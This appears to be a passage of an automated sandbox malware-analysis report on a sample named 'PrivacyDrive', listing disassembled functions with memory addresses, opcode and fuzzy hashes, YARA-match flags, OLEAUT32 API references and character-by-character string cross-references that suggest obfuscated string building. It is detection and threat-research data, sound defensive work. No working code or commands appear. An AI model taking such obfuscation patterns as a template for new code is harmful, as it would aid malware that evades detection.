Instruction Fuzzy Hash: 15015EF660030297E731BE59C4C0B6BB7E86FA4600F18457CD9C657204FB79F9958791

Function 05A603B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4147aed3daa3a20bc70b403452cade9f2d104aa41864c6b219c6a1720fa72123
Instruction ID: 2456f6d4a50b451fb467a325dc1cff3b11157ebadf6b079ff89d449e165683bd
Opcode Fuzzy Hash: 4147aed3daa3a20bc70b403452cade9f2d104aa41864c6b219c6a1720fa72123
Instruction Fuzzy Hash: 7D01B1F170430147D720DF24A9DCF3BB2A8BF90A59F08443CD91697201DB71E844D2A1

Function 010259AB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a0b57e7b5838c5d051a6494e588ab03b56762f7dbbfb4ea49c5814e37579cc
Instruction ID: f698710159c5fb0308f0e3161a7026a2e61ac7fa0e1b8dd6012f5049a858447d
Opcode Fuzzy Hash: 03a0b57e7b5838c5d051a6494e588ab03b56762f7dbbfb4ea49c5814e37579cc
Instruction Fuzzy Hash: 55215871418340ABD2009B18C881AAFFBF0AF9A254F18891DF9C893261E336C994DB4B

Function 05A43FA9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb7ad24bba6150e8c010eef4509f96c263710ac6b0dc6b63f397caed48aa7b2
Instruction ID: 6a540bd66e92dde3aee8f8ac57f7678736bcdc2c1968de280ccbf5c410286a03
Opcode Fuzzy Hash: 0fb7ad24bba6150e8c010eef4509f96c263710ac6b0dc6b63f397caed48aa7b2
Instruction Fuzzy Hash: 89214771508300AAD7009B54E54AB2FFBF1ABCA248F14881DF98897661E336C998DB57

Function 01058D52 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4f1dac993e03f1ef20d7eb187811407bb58be7fd4febd14efeba1fcf2bc281
Instruction ID: 5085496141a20f8e7f8dfa22858b74a19a2edb14b4438324294455b2de0171aa
Opcode Fuzzy Hash: ab4f1dac993e03f1ef20d7eb187811407bb58be7fd4febd14efeba1fcf2bc281
Instruction Fuzzy Hash: EB11F33040D280DBD385AF19C884A1FFFF5EBA6605F68895EE9C597252C236E8508B67

Function 05A77350 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251542b6a5ed3cbc268e20293111e366c86cad96976b829ad6bbb12bc78fd65f
Instruction ID: 493e4a1ae2960676f723475b973cbcb3818ded111b236aa2f7025e8ece9a8fd0
Opcode Fuzzy Hash: 251542b6a5ed3cbc268e20293111e366c86cad96976b829ad6bbb12bc78fd65f
Instruction Fuzzy Hash: BD11323450D284DBD342EF18D884E2EFBF5EBA6604F588C5DE8C097212C336D8118B67

Function 01018B72 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0bc6cc3fdd4b167a1ee70d265d0f9124672522aacad7ac7bde586668fd040
Instruction ID: 72554fe5d30ba96d8e8b3f4b7cbbbe98e8b1a19e6b7b8923f099d13bf60fe122
Opcode Fuzzy Hash: 94b0bc6cc3fdd4b167a1ee70d265d0f9124672522aacad7ac7bde586668fd040
Instruction Fuzzy Hash: 57F09EB7B2222107B740CD3AFCC0437B396F7C6124B1D843DE980D3204C939E5068298

Function 05A37170 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99dc359af5f2379ac70e8c48aff49d380072db9f6b948c25d892ec65444ec5ef
Instruction ID: df80bb1ca2f6f6512533a79f60ee33c3030dc9f5d8f4d20d720a20640d2ad1a7
Opcode Fuzzy Hash: 99dc359af5f2379ac70e8c48aff49d380072db9f6b948c25d892ec65444ec5ef
Instruction Fuzzy Hash: 88F052B772521B0BB710CDAAFCC0C3BB3E6E7C6129B290038F842D3200C830E90782A0

Function 0102539E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e74d33bbbb1b0ffe6fc6b1f0735e7644a65a0d8641347525061f40f2920dc9
Instruction ID: 202b5a68ff4ad52a6de7a81a5206600d72dc310af7f8b4d4f40de4f642bb9f82
Opcode Fuzzy Hash: f3e74d33bbbb1b0ffe6fc6b1f0735e7644a65a0d8641347525061f40f2920dc9
Instruction Fuzzy Hash: F701E23151D3809AD3209F14D981AAFF7F5EF92A42F459C2DE9C992250E336CC54EB1B

Function 05A4399C Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef03b48eed1ee47772e417179353b9f529dea8e94541cc0bf0994e561112c61d
Instruction ID: 41f364061279bab4f14521ab0fedee19fb717c9c025fb7feb81debff8dc0be3c
Opcode Fuzzy Hash: ef03b48eed1ee47772e417179353b9f529dea8e94541cc0bf0994e561112c61d
Instruction Fuzzy Hash: 5F01223111C380AAD730CF54E955AAFBBF4EF82A01F008C2DE8C982251E336C854EB17

Function 0102C952 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction ID: f71345003b9e9ff78e6ab47f4fa86218aa670b0f166f5a2e657fcc2174f0e3db
Opcode Fuzzy Hash: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction Fuzzy Hash: BEF0E5B1B042306BEB2389589CC4B7FFBECDB8B264F192469E8C597102D1759845C3E6

Function 05A4AF50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction ID: db087236a7b124a154e736a719124e422191abc2031c2567d34c382f7a8f21a3
Opcode Fuzzy Hash: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction Fuzzy Hash: DDF0ECF56441106BDB23CAD59CC0F37BB9DDBC7254F194415E84657101E1715C45C7E6

Function 0105B3B2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2042b291cc885411595e814b09f319313d63e5916f29e8bc63a26af0d8f5447
Instruction ID: 7bda57f0ad3ed00d48fec61a2ca2be89772fce47e21c617de6a51e1886771170
Opcode Fuzzy Hash: b2042b291cc885411595e814b09f319313d63e5916f29e8bc63a26af0d8f5447
Instruction Fuzzy Hash: 45F06D7040C2409BC340AF29C88492FFBF9EF92641F158C1DE4C597261D235D8A0CB66

Function 05A799B0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c390c2b41db7659b74c836bfa0cd17a588d138b11461b1cdfe9a49e8251329e
Instruction ID: fe3918794641814cb47ff81c84a6c195c7a20ddfe51f00ae4026da55c2aa97b0
Opcode Fuzzy Hash: 0c390c2b41db7659b74c836bfa0cd17a588d138b11461b1cdfe9a49e8251329e
Instruction Fuzzy Hash: 07F0177191C248AFD300AF2AD88492FFBF9EF46685F158D1DE0C597261D235D8A0CB66

Function 01010ECF Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 653b972ba66a407e3b4648847d0ea5d108f0af0e416d1322c5b90c6a46869f73
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 3901B634A11148EFCB55DF98C195AACB7F6FB44310F2481D9E8859B789C734EE81DB40

Function 01052B02 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 35a135ce56c35edfab2b3c96c557b35466376e1e7dc48d8064ba1e6629435ee4
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 5CD05B21608321867BA48D1D9410477F7E4FE87711B45555EF9C1D3144D230D841D169

Function 05A71100 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 0a542be03707cf5b662b9bafa19f17677d3de7b835a1961e01e70b82af3a3b41
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: A6D05E21A0C225469B648E19A801977F7E0FA87A11F49956EF592E7148D230D841D2A9

Function 01027BF4 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: babbbec20277373ca4efb2e358d653785f90b3f3a970c42770f5635e692a0d64
Instruction ID: 54223abe99d5428ab2bccb2d5c8e1821f49740d931aba04f68c99ff59ae2f796
Opcode Fuzzy Hash: babbbec20277373ca4efb2e358d653785f90b3f3a970c42770f5635e692a0d64
Instruction Fuzzy Hash: EEE012719083538BDE14AF14C8005EEB3B1BFA6304F015818D9C9B7154EB35FD468B8B

Function 05A461F2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6deebb0d62c872706f131be78789dfac6c2c14263cd1b9482873d86d4b7dd18e
Instruction ID: 294988b04c540594bf3c17341844144b729450522df6fecc5e5a348a6b516eee
Opcode Fuzzy Hash: 6deebb0d62c872706f131be78789dfac6c2c14263cd1b9482873d86d4b7dd18e
Instruction Fuzzy Hash: F5E01231B08355CBCE15AF14C915A6FB7B1AF86204F015C18E54977110DF31BD069BCB

Function 010454B5 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12d89730267a57265c5ff4f83e4dcdda70c47b379cd581d96b3031b7fdf2c30
Instruction ID: 16377979d0f7591ec9f18c1d3c73801e209d0b64eef3d901765740c17c739b8a
Opcode Fuzzy Hash: c12d89730267a57265c5ff4f83e4dcdda70c47b379cd581d96b3031b7fdf2c30
Instruction Fuzzy Hash: 37B09230A0810187D7880D389455337B1208307221F10B3BE2007F3181CE65CA82080C

Function 05A63AB3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668828eeae49ad90504aa68fe7ca288aaa10733670a2a3e4ef5b4dc52e39f8fc
Instruction ID: dd870a4a1f84b68d9f9a2653633db072d64570da666b78d272ff4b59896a2ce1
Opcode Fuzzy Hash: 668828eeae49ad90504aa68fe7ca288aaa10733670a2a3e4ef5b4dc52e39f8fc
Instruction Fuzzy Hash: B7B09230A1800187D7880C38905A33BB0218306220F14B3BD2007F3180CE25C982080C

Function 0102F835 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed41defb213639c12427ed227e5e8670bce3229be7b0c6efb41ca900001e68b1
Instruction ID: 2bf39182d628c944bac9b3e5f31e047e6dd8a69db21eae18da152cfd954e7912
Opcode Fuzzy Hash: ed41defb213639c12427ed227e5e8670bce3229be7b0c6efb41ca900001e68b1
Instruction Fuzzy Hash: 9FB092E9C402028AD2162E20AD818AAF0280633541F143432AC472220EF92ED218425B

Function 05A4DE33 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6a4c99e66be2353201650c68df910d9c6a36267d5ee9952ef2cd9050d3b6ad
Instruction ID: 81cf7d8756ce2751e2279dc4bfb56efb17d559ff1c01de34bd6b18a334d8b9b6
Opcode Fuzzy Hash: de6a4c99e66be2353201650c68df910d9c6a36267d5ee9952ef2cd9050d3b6ad
Instruction Fuzzy Hash: 87B092E5E4810086D2102F303EAB82AB0A9191365EF043430A80772202A926D919505B

Function 01050B62 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddf7d5978aa49110249b5af0f03b4df7cfe6c3c773fb2c6384d10bcc9886f60
Instruction ID: a0779b4a2e78800a939fc1c378c59f014d6c37fe462950bea6febb7da0b28ad7
Opcode Fuzzy Hash: eddf7d5978aa49110249b5af0f03b4df7cfe6c3c773fb2c6384d10bcc9886f60
Instruction Fuzzy Hash: FCB09234A482008B8218CE04C080830B3F5EB0F602B042018E04967612C720F8008A08

Function 05A6F160 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a8500a8c2df93bd54415daca902c08906776ffe32fbb244e5493c3705b42e7
Instruction ID: 23ec4c7d986e6880c1ea4b43ffcb41a7898a6cf361c65c17647bc3617c121bf0
Opcode Fuzzy Hash: 91a8500a8c2df93bd54415daca902c08906776ffe32fbb244e5493c3705b42e7
Instruction Fuzzy Hash: 68B09234A481008B8614CE04C080830B7F6EB0F600B042408E04963601CB20F8018A08

Function 05A64C47 Relevance: 101.7, APIs: 1, Strings: 57, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 05A64CD6

Strings

], xrefs: 05A64D12
0, xrefs: 05A64EFF
7, xrefs: 05A64DFD
M, xrefs: 05A64E2F
-, xrefs: 05A64D8F
G, xrefs: 05A64D62
u, xrefs: 05A64DBC
R, xrefs: 05A64DC6
=, xrefs: 05A64DDF
\, xrefs: 05A64D08
c, xrefs: 05A64C55
I, xrefs: 05A64E43
P, xrefs: 05A64C69
_, xrefs: 05A64C5F
;, xrefs: 05A64E48
%, xrefs: 05A64DB7
f, xrefs: 05A64DA8
3, xrefs: 05A64E11
;, xrefs: 05A64DE9
1, xrefs: 05A64E3E
', xrefs: 05A64DAD
y, xrefs: 05A64D80
D, xrefs: 05A64E02
n, xrefs: 05A64D26
!, xrefs: 05A64DCB
K, xrefs: 05A64E39
@, xrefs: 05A64D4E
?, xrefs: 05A64DD5
G, xrefs: 05A64E4D
), xrefs: 05A64DA3
O, xrefs: 05A64E25
Y, xrefs: 05A64D1C
Y, xrefs: 05A64D8A
#, xrefs: 05A64DC1
(, xrefs: 05A64D3A
F, xrefs: 05A64E52
O, xrefs: 05A64DF8
[, xrefs: 05A64DD0
9, xrefs: 05A64DF3
^, xrefs: 05A64D94
<, xrefs: 05A64D44
G, xrefs: 05A64D6C
C, xrefs: 05A64DE4
v, xrefs: 05A64D58
+, xrefs: 05A64D99
M, xrefs: 05A64E0C
5, xrefs: 05A64E07
_, xrefs: 05A64E16
G, xrefs: 05A64DB2
g, xrefs: 05A64D9E
/, xrefs: 05A64D85
2, xrefs: 05A64D76
, xrefs: 05A64D30
E, xrefs: 05A64E57
1, xrefs: 05A64E1B
Q, xrefs: 05A64CFE
a, xrefs: 05A64CF4

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
API String ID: 2525500382-1333701383
Opcode ID: 496b5aff95826b7cb3b041ca247619e4a40c7a5923fc71523da095ad73982966
Instruction ID: d472503f1f246b0cc02d52e3a5c411747e6889dbfd293ad1d467773bb21f6b23
Opcode Fuzzy Hash: 496b5aff95826b7cb3b041ca247619e4a40c7a5923fc71523da095ad73982966
Instruction Fuzzy Hash: C291746010C7C0CEE362DB68818875FFFE15BA6308F48499DE5D84B392C3BA8549CB67

Function 05A654AC Relevance: 101.6, APIs: 1, Strings: 57, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 05A6553B

Strings

y, xrefs: 05A655E5
u, xrefs: 05A65621
;, xrefs: 05A6564E
(, xrefs: 05A6559F
-, xrefs: 05A655F4
_, xrefs: 05A654C4
R, xrefs: 05A6562B
], xrefs: 05A65577
+, xrefs: 05A655FE
O, xrefs: 05A6568A
[, xrefs: 05A65635
M, xrefs: 05A65694
;, xrefs: 05A656AD
a, xrefs: 05A65559
), xrefs: 05A65608
E, xrefs: 05A656BC
D, xrefs: 05A65667
^, xrefs: 05A655F9
g, xrefs: 05A65603
G, xrefs: 05A65617
O, xrefs: 05A6565D
<, xrefs: 05A655A9
?, xrefs: 05A6563A
G, xrefs: 05A655D1
n, xrefs: 05A6558B
Q, xrefs: 05A65563
', xrefs: 05A65612
M, xrefs: 05A65671
1, xrefs: 05A656A3
I, xrefs: 05A656A8
0, xrefs: 05A65755
_, xrefs: 05A6567B
2, xrefs: 05A655DB
F, xrefs: 05A656B7
v, xrefs: 05A655BD
Y, xrefs: 05A655EF
#, xrefs: 05A65626
1, xrefs: 05A65680
=, xrefs: 05A65644
\, xrefs: 05A6556D
!, xrefs: 05A65630
/, xrefs: 05A655EA
%, xrefs: 05A6561C
P, xrefs: 05A654CE
7, xrefs: 05A65662
G, xrefs: 05A656B2
Y, xrefs: 05A65581
@, xrefs: 05A655B3
, xrefs: 05A65595
C, xrefs: 05A65649
3, xrefs: 05A65676
f, xrefs: 05A6560D
9, xrefs: 05A65658
K, xrefs: 05A6569E
G, xrefs: 05A655C7
5, xrefs: 05A6566C
c, xrefs: 05A654BA

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
API String ID: 2525500382-1333701383
Opcode ID: 12ab3120f8a1a015780b845450cb7b58fb700fc5b1735bd66a001c95c115aea0
Instruction ID: 0f5f0e748b8b332cc10f6d0cc00cf9cb881ac1100876c7315f427ae86f715d24
Opcode Fuzzy Hash: 12ab3120f8a1a015780b845450cb7b58fb700fc5b1735bd66a001c95c115aea0
Instruction Fuzzy Hash: 2891637000D7C0CEE362D768948875FBFE16BA6308F48599DE1D84B392C7BA8549CB67

Function 05A67404 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 05A674B4

Strings

K, xrefs: 05A6762D
/, xrefs: 05A6743A
3, xrefs: 05A6752C
?, xrefs: 05A67518
', xrefs: 05A674F0
#, xrefs: 05A674DC
-, xrefs: 05A6744A
+, xrefs: 05A6741A
1, xrefs: 05A67522
!, xrefs: 05A674D2
), xrefs: 05A6742A
^, xrefs: 05A6763D
0, xrefs: 05A676EE
=, xrefs: 05A6750E
7, xrefs: 05A67540
;, xrefs: 05A67504
., xrefs: 05A67442
9, xrefs: 05A674FA
%, xrefs: 05A674E6
5, xrefs: 05A67536

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: !$#$%$'$)$+$-$.$/$0$1$3$5$7$9$;$=$?$K$^
API String ID: 2525500382-2333071540
Opcode ID: 1a1257849a2447e9c2471ad57a41dde502248cf64caa643e03828b6f70d4fb67
Instruction ID: d366220e729f88ee322e41dbf463f9c2cc45946370fa33f916be637b632f8a4b
Opcode Fuzzy Hash: 1a1257849a2447e9c2471ad57a41dde502248cf64caa643e03828b6f70d4fb67
Instruction Fuzzy Hash: DD91736010C7C18DD332DB3C944875FBEE16BA6224F184A9DE1E94B3D2C7758545DB63

Function 05A65084 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 05A6508E
VariantInit.OLEAUT32 ref: 05A650A1

Strings

A, xrefs: 05A65117
y, xrefs: 05A65157
q, xrefs: 05A65197
G, xrefs: 05A650E7
o, xrefs: 05A651A7
n, xrefs: 05A651AF
{, xrefs: 05A65147
I, xrefs: 05A650D7
C, xrefs: 05A65107
}, xrefs: 05A65137
K, xrefs: 05A650C7
p=-u, xrefs: 05A650A1
E, xrefs: 05A650F7
s, xrefs: 05A65187
m, xrefs: 05A651B7
u, xrefs: 05A65177
w, xrefs: 05A65167

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$G$I$K$m$n$o$p=-u$q$s$u$w$y${$}
API String ID: 2610073882-4240709207
Opcode ID: b553068d71d9d63bd775f1e26871731333faea79f57424412aeeb382e2c49175
Instruction ID: 8d97f318dbf83a1f6b2b69d9dae4ea4921153603221abbb06b03d1ab53a42229
Opcode Fuzzy Hash: b553068d71d9d63bd775f1e26871731333faea79f57424412aeeb382e2c49175
Instruction Fuzzy Hash: B751017040C7C18ED332DB2894887DEBFE0ABA6314F080A9DD0E94A2D2C7795655CB67

Function 05A664E0 Relevance: 31.6, APIs: 2, Strings: 16, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 05A664EA
VariantInit.OLEAUT32 ref: 05A664FD

Strings

], xrefs: 05A66583
_, xrefs: 05A66593
Y, xrefs: 05A66563
e, xrefs: 05A66543
[, xrefs: 05A66573
a, xrefs: 05A66523
U, xrefs: 05A665C3
J, xrefs: 05A665EB
K, xrefs: 05A665F3
c, xrefs: 05A66533
Q, xrefs: 05A665A3
S, xrefs: 05A665B3
W, xrefs: 05A665D3
I, xrefs: 05A665E3
g, xrefs: 05A66553
p=-u, xrefs: 05A664FD

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: I$J$K$Q$S$U$W$Y$[$]$_$a$c$e$g$p=-u
API String ID: 2610073882-929487483
Opcode ID: a72b09ca0b16eb0f42b72c6d3fae586be6d88b4c592e2bbdbf8ba4dc38341239
Instruction ID: ad315ba67fc048ddb2158fb80be23cc524e5fee8365fcec7d7faee43da7bbe61
Opcode Fuzzy Hash: a72b09ca0b16eb0f42b72c6d3fae586be6d88b4c592e2bbdbf8ba4dc38341239
Instruction Fuzzy Hash: 9851927010DBC1CAE3329B289858BDBBFE0AB96315F044A9DD4ED8B392D7754145CB63

Function 05A66F46 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 79COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 05A66F50
VariantInit.OLEAUT32 ref: 05A66F63

Strings

e, xrefs: 05A66F94
W, xrefs: 05A66FEE
S, xrefs: 05A66FDA
], xrefs: 05A66FBC
U, xrefs: 05A66FE4
a, xrefs: 05A66F80
Y, xrefs: 05A66FA8
g, xrefs: 05A66F9E
